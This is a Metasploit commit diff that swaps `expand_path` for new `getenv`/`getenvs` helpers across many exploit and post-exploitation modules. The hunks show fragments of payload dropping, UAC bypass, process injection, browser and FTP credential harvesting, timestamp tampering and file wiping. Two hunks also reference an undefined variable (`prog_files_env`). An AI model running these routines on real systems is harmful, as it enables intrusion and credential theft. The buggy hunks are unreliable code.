Add getenvs, update getenv, change extract_path use

Stacks of modules were using `extract_path` where it wasn't really semantically correct
because this was the only way to expand environment variables. This commit fixes that
up a bit.

Also, I changed the existing `getenv` function in `stdapi` to `getenvs`, and had it
support the splat operator. I added a `getenv` function which is used just for a
single variable and uses `getenvs` behind the scenes.

The meterpreter console `getenv` command now uses `getenvs`
bug/bundler_fix
OJ 2013-12-19 11:43:59 +10:00
parent 8dfa2e6963
commit 9fb081cb2d
85 changed files with 179 additions and 168 deletions

View File

@ -198,7 +198,7 @@ module ShadowCopy
tmpout = ''
session.response_timeout=120
begin
tmp = session.fs.file.expand_path("%TEMP%")
tmp = session.sys.config.getenv('TEMP')
wmicfl = tmp + "\\"+ sprintf("%.5d",rand(100000))
r = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /append:#{wmicfl} #{wmiccmd}", nil, {'Hidden' => true})
sleep(2)

View File

@ -37,7 +37,7 @@ class Config
# Returns a hash of requested environment variables, along with their values.
# If a requested value doesn't exist in the response, then the value wasn't found.
#
def getenv(var_names)
def getenvs(*var_names)
request = Packet.create_request('stdapi_sys_config_getenv')
var_names.each do |v|
@ -56,6 +56,13 @@ class Config
return result
end
#
# Returns the value of a single requested environment variable name
#
def getenv(var_name)
getenvs(var_name)[var_name]
end
#
# Returns a hash of information about the remote computer.
#

View File

@ -280,7 +280,7 @@ class Console::CommandDispatcher::Stdapi::Sys
end
def cmd_getenv(*args)
vars = client.sys.config.getenv(args)
vars = client.sys.config.getenvs(*args)
if vars.length == 0
print_error("None of the specified environment variables were found/set.")

View File

@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
win_file = file.gsub("/", "\\\\")
if session.type == "meterpreter"
begin
wintemp = session.fs.file.expand_path("%TEMP%")
wintemp = session.sys.config.getenv('TEMP')
win_file = "#{wintemp}\\#{win_file}"
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
session.fs.file.rm(win_file)

View File

@ -68,13 +68,11 @@ class Metasploit3 < Msf::Exploit::Remote
def on_new_session(session)
if session.type == "meterpreter"
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
end
@dropped_files.delete_if do |file|
win_file = file.gsub("/", "\\\\")
if session.type == "meterpreter"
@dropped_files.delete_if do |file|
win_file = file.gsub("/", "\\\\")
begin
wintemp = session.fs.file.expand_path("%TEMP%")
wintemp = session.sys.config.getenv('TEMP')
win_file = "#{wintemp}\\#{win_file}"
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
session.fs.file.rm(win_file)
@ -84,7 +82,6 @@ class Metasploit3 < Msf::Exploit::Remote
print_error("Failed to delete #{win_file}")
false
end
end
end
end

View File

@ -74,13 +74,11 @@ class Metasploit3 < Msf::Exploit::Remote
def on_new_session(session)
if session.type == "meterpreter"
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
end
@dropped_files.each do |file|
win_file = file.gsub("/", "\\\\")
if session.type == "meterpreter"
@dropped_files.each do |file|
win_file = file.gsub("/", "\\\\")
begin
wintemp = session.fs.file.expand_path("%WINDIR%")
wintemp = session.sys.config.getenv('WINDIR')
win_file = "#{wintemp}\\Temp\\#{win_file}"
# Meterpreter should do this automatically as part of
# fs.file.rm(). Until that has been implemented, remove the
@ -93,7 +91,6 @@ class Metasploit3 < Msf::Exploit::Remote
print_error("Failed to delete #{win_file}")
false
end
end
end
@ -169,4 +166,4 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
end

View File

@ -72,13 +72,11 @@ class Metasploit3 < Msf::Exploit::Remote
def on_new_session(session)
if session.type == "meterpreter"
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
end
@dropped_files.delete_if do |file|
win_file = file.gsub("/", "\\\\")
if session.type == "meterpreter"
@dropped_files.delete_if do |file|
win_file = file.gsub("/", "\\\\")
begin
wintemp = session.fs.file.expand_path("%TEMP%")
wintemp = session.sys.config.getenv('TEMP')
win_file = "#{wintemp}\\#{win_file}"
# Meterpreter should do this automatically as part of
# fs.file.rm(). Until that has been implemented, remove the
@ -91,7 +89,6 @@ class Metasploit3 < Msf::Exploit::Remote
print_error("Failed to delete #{win_file}")
false
end
end
end
@ -184,4 +181,4 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
end

View File

@ -66,13 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote
def on_new_session(session)
if session.type == "meterpreter"
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
end
@dropped_files.delete_if do |file|
win_file = file.gsub("/", "\\\\")
if session.type == "meterpreter"
@dropped_files.delete_if do |file|
win_file = file.gsub("/", "\\\\")
begin
wintemp = session.fs.file.expand_path("%TEMP%")
wintemp = session.sys.config.getenv('TEMP')
win_file = "#{wintemp}\\#{win_file}"
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
session.fs.file.rm(win_file)
@ -82,7 +80,6 @@ class Metasploit3 < Msf::Exploit::Remote
print_error("Failed to delete #{win_file}")
false
end
end
end
end
@ -257,4 +254,4 @@ This code allows to launch other executables with user data provided as argument
solution because it allows to pass URL's as arguments. And code executed by mshta is on a privileged zone. Other
executables allow to provide SMB URI's but metasploit only allow to 'simulate' a SMB resource through webdav, so
the target should have the WebClient service enabled, which is only enabled by default on XP SP3.
=end
=end

View File

@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Use the system path for executable to run except the wordpad
if client.sys.config.sysinfo["OS"] =~ /Windows XP/
windir = client.fs.file.expand_path("%ProgramFiles%")
windir = client.sys.config.getenv('ProgramFiles')
cmd="#{windir}\\Windows NT\\Accessories\\wordpad.exe"
else # Windows 2000
cmd = "notepad.exe"

View File

@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Local
# Usint this solution atm because I'm experiencing problems with railgun when trying
# use GetTokenInformation
def low_integrity_level?
tmp_dir = expand_path("%TEMP%")
tmp_dir = session.sys.config.getenv('TEMP')
cd(tmp_dir)
new_dir = "#{rand_text_alpha(5)}"
begin

View File

@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Local
if datastore["WritableDir"] and not datastore["WritableDir"].empty?
temp_dir = datastore["WritableDir"]
else
temp_dir = expand_path("%TEMP%")
temp_dir = client.sys.config.getenv('TEMP')
end
print_status("Using #{temp_dir} to drop malicious DLL...")

View File

@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Local
if datastore["PATH"]
payload_path = datastore["PATH"]
else
payload_path = session.fs.file.expand_path("%TEMP%")
payload_path = session.sys.config.getenv('TEMP')
end
cmd_location = "#{payload_path}\\#{payload_filename}"

View File

@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Local
def runas_method
payload = generate_payload_exe
payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
tmpdir = expand_path("%TEMP%")
tmpdir = session.sys.config.getenv('TEMP')
tempexe = tmpdir + "\\" + payload_filename
write_file(tempexe, payload)
print_status("Uploading payload: #{tempexe}")
@ -126,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Local
bpexe = ::File.join(path, "bypassuac-x86.exe")
end
tmpdir = expand_path("%TEMP%")
tmpdir = session.sys.config.getenv('TEMP')
cmd = "#{tmpdir}\\#{bypass_uac_filename} /c #{tmpdir}\\#{payload_filename}"
print_status("Uploading the bypass UAC executable to the filesystem...")

View File

@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Local
# Build a random name for the share and directory
share_name = Rex::Text.rand_text_alphanumeric(8)
drive = session.fs.file.expand_path("%SYSTEMDRIVE%")
drive = session.sys.config.getenv('SYSTEMDRIVE')
share_dir = "#{drive}\\#{share_name}"
# Create them

View File

@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Local
cmd = datastore["CMD"] || nil
upload_fn = nil
tempdir = session.fs.file.expand_path("%TEMP%")
tempdir = session.sys.config.getenv('TEMP')
if not cmd
# Get the exe payload.
exe = generate_payload_exe
@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Local
# Create a new task to do our bidding, but make sure it doesn't run.
#
taskname ||= Rex::Text.rand_text_alphanumeric(8+rand(8))
sysdir = session.fs.file.expand_path("%SystemRoot%")
sysdir = session.sys.config.getenv('SystemRoot')
taskfile = "#{sysdir}\\system32\\tasks\\#{taskname}"
print_status("Creating task: #{taskname}")

View File

@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Local
end
def low_integrity_level?
tmp_dir = expand_path("%USERPROFILE%")
tmp_dir = session.sys.config.getenv('USERPROFILE')
cd(tmp_dir)
new_dir = "#{rand_text_alpha(5)}"
begin
@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Local
if datastore['TECHNIQUE'] == 'FILE'
payload_file = "#{rand_text_alpha(5+rand(3))}.exe"
begin
tmp_dir = expand_path("%TEMP%")
tmp_dir = session.sys.config.getenv('TEMP')
tmp_dir << "\\Low" unless tmp_dir[-3,3] =~ /Low/i
cd(tmp_dir)
print_status("Trying to drop payload to #{tmp_dir}...")
@ -186,7 +186,7 @@ class Metasploit3 < Msf::Exploit::Local
# Spawn low integrity cmd.exe
print_status("Spawning Low Integrity Cmd Prompt")
windir = client.fs.file.expand_path("%windir%")
windir = session.sys.config.getenv('windir')
li_cmd_pid = client.sys.process.execute("#{windir}\\system32\\cmd.exe", nil, {'Hidden' => false }).pid
count = count_cmd_procs

View File

@ -193,7 +193,7 @@ class Metasploit3 < Msf::Exploit::Local
end
def create_proc
windir = expand_path("%windir%")
windir = session.sys.config.getenv('windir')
cmd = "#{windir}\\System32\\notepad.exe"
# run hidden
begin

View File

@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Local
print_status("Launching notepad to host the exploit...")
windir = expand_path("%windir%")
windir = session.sys.config.getenv('windir')
cmd = "#{windir}\\SysWOW64\\notepad.exe"
process = client.sys.process.execute(cmd, nil, {'Hidden' => true})
host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)

View File

@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Local
# Creates a temp notepad.exe to inject payload in to given the payload
# Returns process PID
def create_temp_proc()
windir = client.fs.file.expand_path("%windir%")
windir = client.sys.config.getenv('windir')
# Select path of executable to run depending the architecture
if @payload_arch.first== "x86" and client.platform =~ /x86/
cmd = "#{windir}\\System32\\notepad.exe"

View File

@ -130,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Local
# Writes script to target host
def write_script_to_target(vbs,name)
tempdir = expand_path("%TEMP%")
tempdir = session.sys.config.getenv('TEMP')
if name == nil
tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
else

View File

@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Local
def check
os = sysinfo["OS"]
if os =~ /windows/i
file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
file_path = session.sys.config.getenv('windir') << "\\system32\\win32k.sys"
major, minor, build, revision, branch = file_version(file_path)
vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision}")

View File

@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Local
# Returns path for XML and payload
def generate_path(rexename)
# Generate a path to write payload and XML
path = datastore['PATH'] || expand_path("%TEMP%")
path = datastore['PATH'] || session.sys.config.getenv('TEMP')
xml_path = "#{path}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.xml"
rexe_path = "#{path}\\#{rexename}"
return xml_path,rexe_path

View File

@ -59,8 +59,9 @@ class Metasploit3 < Msf::Exploit::Local
exe = Msf::Util::EXE.to_win32pe_service(session.framework, raw)
sysdir = session.fs.file.expand_path("%SystemRoot%")
tmpdir = session.fs.file.expand_path("%TEMP%")
dir_env = session.sys.config.getenvs('SystemRoot', 'TEMP')
sysdir = dir_env['SystemRoot']
tmpdir = dir_env['TEMP']
print_status("Meterpreter stager executable #{exe.length} bytes long being uploaded..")
begin
@ -122,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Local
moved = false
configed = false
#default path, but there should be an ImagePath registry key
source = session.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe")
source = "#{sysdir}\\system32\\#{serv}.exe"
#get path to exe; parse out quotes and arguments
sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s
sourcemaybe = session.fs.file.expand_path(sourceorig)

View File

@ -190,7 +190,7 @@ Processor-Speed=#{processor_speed}
end
end
win_temp = client.fs.file.expand_path("%TEMP%")
win_temp = client.sys.config.getenv('TEMP')
win_file = "#{win_temp}\\#{payload_exe}"
print_status("Attempting to delete #{win_file} ...")
client.shell_command_token(%Q|attrib.exe -r #{win_file}|)

View File

@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
begin
print_good("Deleting the VBS payload \"#{@var_vbs_name}.vbs\" ...")
windir = client.fs.file.expand_path("%WINDIR%")
windir = client.sys.config.getenv('WINDIR')
client.fs.file.rm("#{windir}\\system32\\" + @var_vbs_name + ".vbs")
print_good("Deleting the MOF file \"#{@var_mof_name}.mof\" ...")
cmd = "#{windir}\\system32\\attrib.exe -r " +

View File

@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
win_file = file.gsub("/", "\\\\")
if session.type == "meterpreter"
begin
windir = session.fs.file.expand_path("%WINDIR%")
windir = session.sys.config.getenv('WINDIR')
win_file = "#{windir}\\system32\\#{win_file}"
# Meterpreter should do this automatically as part of
# fs.file.rm(). Until that has been implemented, remove the

View File

@ -45,7 +45,7 @@ class Metasploit3 < Msf::Post
end
def exists_exe?(exe)
path = expand_path("$PATH")
path = session.sys.config.getenv("PATH")
if path.nil? or path.empty?
return false
end

View File

@ -43,7 +43,7 @@ class Metasploit3 < Msf::Post
paths = enum_users_unix
when /win/
@platform = :windows
drive = session.fs.file.expand_path("%SystemDrive%")
drive = session.sys.config.getenv('SystemDrive')
os = session.sys.config.sysinfo['OS']
if os =~ /Windows 7|Vista|2008/
@ -265,7 +265,7 @@ class Metasploit3 < Msf::Post
def whoami
if @platform == :windows
session.fs.file.expand_path("%USERNAME%")
session.sys.config.getenv('USERNAME')
else
session.shell_command("whoami").chomp
end

View File

@ -54,9 +54,8 @@ class Metasploit3 < Msf::Post
var_names << registry_enumvals("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment")
output = []
var_names.delete(nil)
var_names.flatten.uniq.sort.each do |v|
# Emulate the output of set and env, e.g. VAR=VALUE
output << "#{v}=#{session.fs.file.expand_path("\%#{v}\%")}"
session.sys.config.getenvs(*var_names.flatten.uniq.sort).each do |k, v|
output << "#{k}=#{v}"
end
@output = output.join("\n")
@ltype = "windows.environment"

View File

@ -240,7 +240,7 @@ class Metasploit3 < Msf::Post
def whoami
if @platform == :windows
session.fs.file.expand_path("%USERNAME%")
session.sys.config.getenv('USERNAME')
else
session.shell_command("whoami").chomp
end

View File

@ -262,7 +262,6 @@ class Metasploit3 < Msf::Post
def get_ff_and_loot_path
@paths = {}
check_paths = []
drive = expand_path("%SystemDrive%")
loot_file = Rex::Text::rand_text_alpha(6) + ".txt"
case @platform
@ -271,7 +270,9 @@ class Metasploit3 < Msf::Post
print_error("You need root privileges on this platform for DECRYPT option")
return false
end
tmpdir = expand_path("%TEMP%") + "\\"
env_vars = session.sys.config.getenvs('TEMP', 'SystemDrive')
tmpdir = env_vars['TEMP'] + "\\"
drive = env_vars['SystemDrive']
# this way allows for more independent use of meterpreter
# payload (32 and 64 bit) and cleaner code
check_paths << drive + '\\Program Files\\Mozilla Firefox\\'
@ -628,9 +629,9 @@ class Metasploit3 < Msf::Post
def whoami
if @platform == :windows
return session.fs.file.expand_path("%USERNAME%")
session.sys.config.getenv('USERNAME')
else
return session.shell_command("whoami").chomp
session.shell_command("whoami").chomp
end
end
end

View File

@ -307,7 +307,7 @@ class Metasploit3 < Msf::Post
def whoami
if @platform == :windows
session.fs.file.expand_path("%USERNAME%")
session.sys.config.getenv('USERNAME')
else
session.shell_command("whoami").chomp
end

View File

@ -50,7 +50,7 @@ class Metasploit3 < Msf::Post
base = "/Users/#{user}/Library/Thunderbird/Profiles/"
when /win/
if session.type =~ /meterpreter/
user_profile = session.fs.file.expand_path("%APPDATA%")
user_profile = session.sys.config.getenv('APPDATA')
else
user_profile = cmd_exec("echo %APPDATA%").strip
end

View File

@ -176,7 +176,7 @@ EOS
ring0_code.gsub!('TPTP', [pid].pack('V'))
# Create the malicious Keyboard Layout file...
tmpdir = session.fs.file.expand_path("%TEMP%")
tmpdir = session.sys.config.getenv('TEMP')
fname = "p0wns.boom"
dllpath = "#{tmpdir}\\#{fname}"
fd = session.fs.file.new(dllpath, 'wb')

View File

@ -41,7 +41,7 @@ class Metasploit3 < Msf::Post
paths = []
services = []
vuln = ""
@temp = session.fs.file.expand_path("%TEMP%")
@temp = session.sys.config.getenv('TEMP')
if init_railgun() == :error
return

View File

@ -233,12 +233,14 @@ class Metasploit3 < Msf::Post
print_status("Searching BulletProof FTP Client installation directory...")
# BulletProof FTP Client 2.6 uses the installation dir to store bookmarks files
program_files_x86 = expand_path('%ProgramFiles(X86)%')
if not program_files_x86.empty? and program_files_x86 !~ /%ProgramFiles\(X86\)%/
program_files = program_files_x86 #x64
progfiles_env = session.sys.config.getenvs('ProgramFiles(X86)', 'ProgramFiles')
progfilesx86 = prog_files_env['ProgramFiles(X86)']
if not progfilesx86.empty? and progfilesx86 !~ /%ProgramFiles\(X86\)%/
program_files = progfilesx86 # x64
else
program_files = expand_path('%ProgramFiles%') #x86
program_files = progfiles_env['ProgramFiles'] # x86
end
session.fs.dir.foreach(program_files) do |dir|
if dir =~ /BulletProof FTP Client/
vprint_status("BulletProof Installation directory found at #{program_files}\\#{dir}")

View File

@ -33,7 +33,7 @@ class Metasploit3 < Msf::Post
return
end
drive = session.fs.file.expand_path("%SystemDrive%")
drive = session.sys.config.getenv('SystemDrive')
case session.platform
when /win64/i
@progs = drive + '\\Program Files (x86)\\'
@ -360,6 +360,6 @@ class Metasploit3 < Msf::Post
end
def whoami
return session.fs.file.expand_path("%USERNAME%")
return session.sys.config.getenv('USERNAME')
end
end

View File

@ -40,10 +40,12 @@ class Metasploit3 < Msf::Post
# Steam client is only 32 bit so we need to know what arch we are on so that we can use
# the correct program files folder.
# We will just use an x64 only defined env variable to check.
if not expand_path('%ProgramFiles(X86)%').empty? and expand_path('%ProgramFiles(X86)%') !~ /%ProgramFiles\(X86\)%/
progs = expand_path('%ProgramFiles(X86)%') #x64
progfiles_env = session.sys.config.getenvs('ProgramFiles(X86)', 'ProgramFiles')
progfilesx86 = prog_files_env['ProgramFiles(X86)']
if not progfilesx86.empty? and progfilesx86 !~ /%ProgramFiles\(X86\)%/
progs = progfilesx86 # x64
else
progs = expand_path('%ProgramFiles%') #x86
progs = progfiles_env['ProgramFiles'] # x86
end
path = progs + '\\Steam\\config'

View File

@ -103,8 +103,7 @@ class Metasploit3 < Msf::Post
def get_config_files
# Determine if TortoiseSVN is installed and parse config files
savedpwds = 0
user_appdata = session.fs.file.expand_path("%APPDATA%")
path = user_appdata + '\\Subversion\\auth\\svn.simple\\'
path = session.fs.file.expand_path("%APPDATA%\\Subversion\\auth\\svn.simple\\")
print_status("Checking for configuration files in: #{path}")
begin

View File

@ -107,7 +107,7 @@ class Metasploit3 < Msf::Post
end
def check_systemroot
winpath = expand_path("%SYSTEMROOT%")+'\\wcx_ftp.ini'
winpath = expand_path("%SYSTEMROOT%\\wcx_ftp.ini")
check_other(winpath)
end

View File

@ -98,11 +98,15 @@ class Metasploit3 < Msf::Post
locations = []
#Checks
locations << {:name => 'UltraVNC',
:check_file => session.fs.file.expand_path("%PROGRAMFILES%")+'\\UltraVNC\\ultravnc.ini',
:pass_variable => 'passwd=',
:viewonly_variable => 'passwd2=',
:port_variable => 'PortNumber='}
progfiles_env = session.sys.config.getenvs('ProgramFiles', 'ProgramFiles(x86)')
progfiles_env.each do |k, v|
next if v.blank?
locations << {:name => 'UltraVNC',
:check_file => "#{v}\\UltraVNC\\ultravnc.ini",
:pass_variable => 'passwd=',
:viewonly_variable => 'passwd2=',
:port_variable => 'PortNumber='}
end
locations << {:name => 'WinVNC3_HKLM',
:check_reg => 'HKLM\\Software\\ORL\\WinVNC3',

View File

@ -237,7 +237,7 @@ class Metasploit3 < Msf::Post
def run
print_status("Looking for WinSCP.ini file storage...")
get_ini(client.fs.file.expand_path("%PROGRAMFILES%")+'\\WinSCP\\WinSCP.ini')
get_ini(client.fs.file.expand_path("%PROGRAMFILES%\\WinSCP\\WinSCP.ini"))
print_status("Looking for Registry Storage...")
get_reg()
print_status("Done!")

View File

@ -53,7 +53,8 @@ class Metasploit3 < Msf::Post
user = session.sys.config.getuid
userpath = nil
useroffcpath = nil
sysdrv = session.fs.file.expand_path("%SystemDrive%")
env_vars = session.sys.config.getenvs('SystemDrive', 'USERNAME')
sysdrv = env_vars['SystemDrive']
if os =~ /Windows 7|Vista|2008/
userpath = sysdrv + "\\Users\\"
lnkpath = "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\"
@ -76,7 +77,7 @@ class Metasploit3 < Msf::Post
userinfo = {}
end
else
uservar = session.fs.file.expand_path("%USERNAME%")
uservar = env_vars['USERNAME']
userinfo['username'] = uservar
userinfo['userpath'] = userpath + uservar + lnkpath
userinfo['useroffcpath'] = userpath + uservar + officelnkpath

View File

@ -285,7 +285,8 @@ class Metasploit3 < Msf::Post
host = session.session_host
#Get Google Chrome user data path
sysdrive = expand_path("%SYSTEMDRIVE%").strip
env_vars = session.sys.config.getenvs('SYSTEMDRIVE', 'USERNAME')
sysdrive = env_vars['SYSTEMDRIVE'].strip
if directory?("#{sysdrive}\\Users")
@profiles_path = "#{sysdrive}/Users"
@data_path = "\\AppData\\Local\\Google\\Chrome\\User Data\\Default"
@ -310,7 +311,7 @@ class Metasploit3 < Msf::Post
else
uid = session.sys.config.getuid
print_status "Running as user '#{uid}'..."
usernames << expand_path("%USERNAME%").strip
usernames << env_vars['USERNAME'].strip
end
has_sqlite3 = true

View File

@ -292,7 +292,7 @@ class Metasploit3 < Msf::Post
return results
end
windir = session.fs.file.expand_path("%windir%")
windir = session.sys.config.getenv('windir')
getfile = session.fs.file.search(windir + "\\system32\\drivers\\etc\\","services.*",recurse=true,timeout=-1)
data = nil
@ -332,7 +332,7 @@ class Metasploit3 < Msf::Post
elsif exist?(val_location + "\\my.cnf")
data = read_file(val_location + "\\my.cnf")
else
sysdriv=session.fs.file.expand_path("%SYSTEMDRIVE%")
sysdriv=session.sys.config.getenv('SYSTEMDRIVE')
getfile = session.fs.file.search(sysdriv + "\\","my.ini",recurse=true,timeout=-1)
getfile.each do |file|
if exist?("#{file['path']}\\#{file['name']}")

View File

@ -55,7 +55,7 @@ class Metasploit3 < Msf::Post
def download_files(location, file_type)
sysdriv = client.fs.file.expand_path("%SYSTEMDRIVE%")
sysdriv = client.sys.config.getenv('SYSTEMDRIVE')
sysnfo = client.sys.config.sysinfo['OS']
profile_path_old = sysdriv + "\\Documents and Settings\\"
profile_path_new = sysdriv + "\\Users\\"

View File

@ -257,7 +257,7 @@ class Metasploit3 < Msf::Post
xp_c = "\\Cookies\\index.dat"
h_paths = []
c_paths = []
base = session.fs.file.expand_path("%USERPROFILE%")
base = session.sys.config.getenv('USERPROFILE')
if host['OS'] =~ /(Windows 7|2008|Vista)/
h_paths << base + vist_h
h_paths << base + vist_hlow

View File

@ -28,7 +28,8 @@ class Metasploit3 < Msf::Post
users = []
user = session.sys.config.getuid
path4users = ""
sysdrv = session.fs.file.expand_path("%SystemDrive%")
env_vars = session.sys.config.getenvs('SystemDrive', 'USERNAME')
sysdrv = env_vars['SystemDrive']
if os =~ /Windows 7|Vista|2008/
path4users = sysdrv + "\\Users\\"
@ -49,7 +50,7 @@ class Metasploit3 < Msf::Post
end
else
userinfo = {}
uservar = session.fs.file.expand_path("%USERNAME%")
uservar = env_vars['USERNAME']
userinfo['username'] = uservar
userinfo['userappdata'] = path4users + uservar + profilepath
users << userinfo
@ -89,7 +90,7 @@ class Metasploit3 < Msf::Post
end
if powershell_version =~ /2./
print_status("Powershell Modules:")
powershell_module_path = session.fs.file.expand_path("%PSModulePath%")
powershell_module_path = session.sys.config.getenv('PSModulePath')
session.fs.dir.foreach(powershell_module_path) do |m|
next if m =~ /^(\.|\.\.)$/
print_status("\t#{m}")

View File

@ -147,7 +147,7 @@ class Metasploit3 < Msf::Post
print_prefetch_key_value
print_timezone_key_values(key_value)
print_good("Current UTC Time: %s" % Time.now.utc)
sys_root = expand_path("%SYSTEMROOT%")
sys_root = session.sys.config.getenv('SYSTEMROOT')
full_path = sys_root + "\\Prefetch\\"
file_type = "*.pf"
print_status("Gathering information from remote system. This will take awhile..")

View File

@ -115,7 +115,7 @@ class Metasploit3 < Msf::Post
# Initialize all 7 possible paths for the answer file
#
def init_paths
drive = session.fs.file.expand_path("%SystemDrive%")
drive = session.sys.config.getenv('SystemDrive')
files =
[

View File

@ -60,7 +60,7 @@ class Metasploit3 < Msf::Post
tmpout = ''
session.response_timeout=120
begin
tmp = session.fs.file.expand_path("%TEMP%")
tmp = session.sys.config.getenv('TEMP')
wmicfl = tmp + "\\"+ sprintf("%.5d",rand(100000))
print_status "running command wmic #{wmiccmd}"
r = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /append:#{wmicfl} #{wmiccmd}", nil, {'Hidden' => true})

View File

@ -76,9 +76,10 @@ class Metasploit3 < Msf::Post
url = datastore["URL"]
filename = datastore["FILENAME"] || url.split('/').last
download_path = session.fs.file.expand_path(datastore["DOWNLOAD_PATH"])
if download_path.nil? or download_path.empty?
path = session.fs.file.expand_path("%TEMP%")
env_vars = session.sys.config.getenvs(datastore['DOWNLOAD_PATH'], 'TEMP')
download_path = env_vars[datastore['DOWNLOAD_PATH']]
if download_path.blank?
path = env_vars['TEMP']
else
path = download_path
end

View File

@ -87,7 +87,7 @@ class Metasploit3 < Msf::Post
end
def create_pac(local_pac)
pac_file = expand_path("%APPDATA%") << "\\" << Rex::Text.rand_text_alpha((rand(8)+6)) << ".pac"
pac_file = session.sys.config.getenv("APPDATA") << "\\" << Rex::Text.rand_text_alpha((rand(8)+6)) << ".pac"
conf_pac = ""
if ::File.exists?(local_pac)

View File

@ -159,7 +159,7 @@ class Metasploit3 < Msf::Post
# Creates a temp notepad.exe to inject payload in to given the payload
# Returns process PID
def create_temp_proc(pay)
windir = client.fs.file.expand_path("%windir%")
windir = client.sys.config.getenv('windir')
# Select path of executable to run depending the architecture
if pay.arch.join == "x86" and client.platform =~ /x86/
cmd = "#{windir}\\System32\\notepad.exe"

View File

@ -250,7 +250,7 @@ class Metasploit3 < Msf::Post
# Function for writing script to target host
#-------------------------------------------------------------------------------
def write_script_to_target(vbs)
tempdir = session.fs.file.expand_path("%TEMP%")
tempdir = session.sys.config.getenv('TEMP')
tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
fd = session.fs.file.new(tempvbs, "wb")
fd.write(vbs)
@ -352,7 +352,7 @@ class Metasploit3 < Msf::Post
# Function for writing executable to target host
#-------------------------------------------------------------------------------
def write_exe_to_target(vbs,rexename)
tempdir = session.fs.file.expand_path("%TEMP%")
tempdir = session.sys.config.getenv('TEMP')
tempvbs = tempdir + "\\" + rexename
fd = session.fs.file.new(tempvbs, "wb")
fd.write(vbs)

View File

@ -46,7 +46,8 @@ class Metasploit3 < Msf::Post
else
print_status("Rpcap service found: #{serv['Name']}")
reg=registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\rpcapd","Start")
prog=expand_path("%ProgramFiles%") << "\\winpcap\\rpcapd.exe"
# TODO: check if this works on x64
prog=session.sys.config.getenv('ProgramFiles') << "\\winpcap\\rpcapd.exe"
if reg != 2
print_status("Setting rpcapd as 'auto' service")
service_change_startup("rpcapd","auto")

View File

@ -106,7 +106,7 @@ class Metasploit3 < Msf::Post
end
# set profile paths
sysdrive = session.fs.file.expand_path("%SYSTEMDRIVE%")
sysdrive = session.sys.config.getenv('SYSTEMDRIVE')
os = @host_info['OS']
profiles_path = sysdrive + "\\Documents and Settings\\"
profiles_path = sysdrive + "\\Users\\" if os =~ /(Windows 7|2008|Vista)/

View File

@ -57,8 +57,8 @@ class Metasploit3 < Msf::Post
#Function to calculate the size of the cluster
def size_cluster()
drive = expand_path("%SystemDrive%")
r = client.railgun.kernel32.GetDiskFreeSpaceA(drive,4,4,4,4)
drive = session.sys.config.getenv('SystemDrive')
r = session.railgun.kernel32.GetDiskFreeSpaceA(drive,4,4,4,4)
cluster = r["lpBytesPerSector"] * r["lpSectorsPerCluster"]
print_status("Cluster Size: #{cluster}")
@ -68,7 +68,7 @@ class Metasploit3 < Msf::Post
#Function to calculate the real file size on disk (file size + slack space)
def size_on_disk(file)
size_file = client.fs.file.stat(file).size;
size_file = session.fs.file.stat(file).size;
print_status("Size of the file: #{size_file}")
if (size_file<800)
@ -94,13 +94,13 @@ class Metasploit3 < Msf::Post
rsec= Rex::Text.rand_text_numeric(7,bad='012')
date = Time.now - rsec.to_i
print_status("Changing MACE attributes")
client.priv.fs.set_file_mace(file, date,date,date,date)
session.priv.fs.set_file_mace(file, date,date,date,date)
end
#Function to overwrite the file
def file_overwrite(file,type,n)
#FILE_FLAG_WRITE_THROUGH: Write operations will go directly to disk
r = client.railgun.kernel32.CreateFileA(file, "GENERIC_WRITE", "FILE_SHARE_READ|FILE_SHARE_WRITE", nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0)
